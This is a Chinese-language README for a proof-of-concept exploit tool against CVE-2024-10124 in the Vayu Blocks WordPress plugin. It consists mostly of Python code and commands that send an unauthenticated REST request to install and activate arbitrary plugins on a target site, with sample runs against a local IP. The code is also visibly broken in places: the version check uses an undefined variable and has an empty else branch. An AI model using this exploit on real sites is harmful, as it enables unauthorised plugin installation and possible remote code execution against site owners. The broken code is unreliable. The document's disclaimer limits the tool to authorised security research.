Vayu Blocks 漏洞利用工具

这是一个针对 WordPress 插件 Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce 的安全漏洞（CVE-2024-10124）的概念验证（PoC）工具。该漏洞源于版本 1.1.1 及之前版本中 tp_install() 函数缺少权限检查，允许未认证的攻击者安装并激活任意插件，可能导致远程代码执行。

功能特性

未授权插件安装：利用漏洞在目标 WordPress 站点上安装并激活指定插件，默认安装 hello-dolly 插件。
灵活的参数配置：支持通过命令行参数指定目标 URL、插件名称以及是否仅进行版本检测。
清晰的执行反馈：提供详细的请求状态码和响应内容输出，方便验证操作结果。

安装指南

系统要求

Python 3.x
requests 库

安装步骤

克隆或下载本工具代码：

git clone https://github.com/your-repo/CVE-2024-10124-Poc.git
cd CVE-2024-10124-Poc

安装 Python 依赖：
```
pip install requests
```

使用说明

基础命令格式

python CVE-2024-10124.py -u <目标URL> [选项]

使用示例

1. 检测目标站点是否存在漏洞

python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

该命令将检测 Vayu Blocks 插件的版本，并输出是否为易受攻击的版本。

2. 安装默认插件（hello-dolly）

python CVE-2024-10124.py -u http://192.168.100.74/wordpress

在目标站点上安装并激活 hello-dolly 插件。

3. 安装指定名称的插件

python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p custom-plugin-name

将指定的 custom-plugin-name 插件安装到目标站点。

命令行参数说明

参数	描述	示例
`-u`, `--url`	目标 WordPress 站点的 URL（必须包含协议）	`-u http://example.com/wordpress`
`-p`, `--plugin`	要安装的插件名称，默认为 `hello-dolly`	`-p akismet`
`--check-version`	仅检测插件版本，不执行安装操作	`--check-version`
`-h`, `--help`	显示帮助信息

输出示例

Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

核心代码

版本检测功能

def check_version(url):
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("URL must start with http:// or https://")



    try:
        response = requests.get(url_version, timeout=10)
        response.raise_for_status()

        if "Stable tag:" in response.text:
            stable_tag = response.text.split("Stable tag:")[1].split()[0].strip()
            if stable_tag <= "1.1.1":
                print(f"The site is vulnerable. Current version: {stable_tag}")
            else:
                print(f"The site is not vulnerable. Current version: {stable_tag}")
        else:


    except requests.exceptions.RequestException as e:
        print("An error occurred while checking version:", e)

未授权插件安装功能

def install_plugin(url, plugin_name):
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("URL must start with http:// or https://")

    if not plugin_name:
        raise ValueError("Plugin name cannot be empty")

    full_url = f"{url}/wp-json/ai/v1/vayu-site-builder"

    payload = {
        "params": {
            "plugin": {
                plugin_name: plugin_name.replace(" ", "-")
            },
            "allPlugins": [
                {
                    plugin_name: f"{plugin_name}/{plugin_name}.php"
                }
            ],
            "themeSlug": "",
            "proThemePlugin": "",
            "templateType": "free",
            "tmplFreePro": "plugin"
        }
    }

    headers = {
        "Content-Type": "application/json"
    }

    try:
        time.sleep(3)

        response = requests.post(full_url, headers=headers, json=payload, timeout=10)
        response.raise_for_status()

        if response.status_code == 200:
            print("Response Status Code:", response.status_code)
            print("The plugin has been successfully uploaded and activated.")
            print("Response Content:", response.json())
        else:
            print("Unexpected status code:", response.status_code)
            print("Response Content:", response.text)

    except requests.exceptions.RequestException as e:
        print("An error occurred while installing plugin:", e)

主程序入口与参数解析

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation\n and activation due to a missing capability check on the tp_install() function in all versions\n up to, and including, 1.1.1. This makes it possible\n for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1..")
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://192.168.100.74/wordpress)")
    parser.add_argument("-p", "--plugin", default="hello-dolly", help="Plugin name (default: hello-dolly)")
    parser.add_argument("--check-version", action="store_true", help="Check if the site is vulnerable based on plugin version")

    args = parser.parse_args()

    if args.check_version:
        check_version(args.url)
    else:
        install_plugin(args.url, args.plugin)

注意事项

本工具仅用于教育和安全研究目的，请在授权环境下使用。
滥用此工具进行未经授权的攻击行为将承担相应法律责任。 6HFtX5dABrKlqXeO5PUv/06/DsM1JyS4V5fB4WUMWXpuJy37VyURC22/4wYCWdNH